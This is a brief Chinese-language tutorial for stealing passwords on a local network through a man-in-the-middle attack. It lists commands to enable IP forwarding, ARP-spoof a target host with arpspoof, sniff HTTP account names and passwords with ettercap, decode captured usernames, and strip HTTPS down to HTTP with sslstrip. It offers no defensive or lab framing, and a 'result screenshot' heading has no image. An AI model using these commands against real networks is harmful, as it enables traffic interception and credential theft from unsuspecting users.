1、开启IP转发
echo 1 > /proc/sys/net/ipv4/ip_forward
2、ARP欺骗
arpspoof -i eth0 -t 172.16.9.xxx 172.16.8.xx
3、密码获取
ettercap -Tq -i eth0
-Tq >> 启动文本模式 ,q安静模式
-i 网卡
注:只能获取HTTP网站账户密码(
http://defcon.cn/
)
结果截图:
如果账户名是中文 可用URL解码器(http://www.convertstring.com/zh_CN/EncodeDecode/UrlDecode)解码
sslstrip -a -f -k(可转HTTPS为HTTP)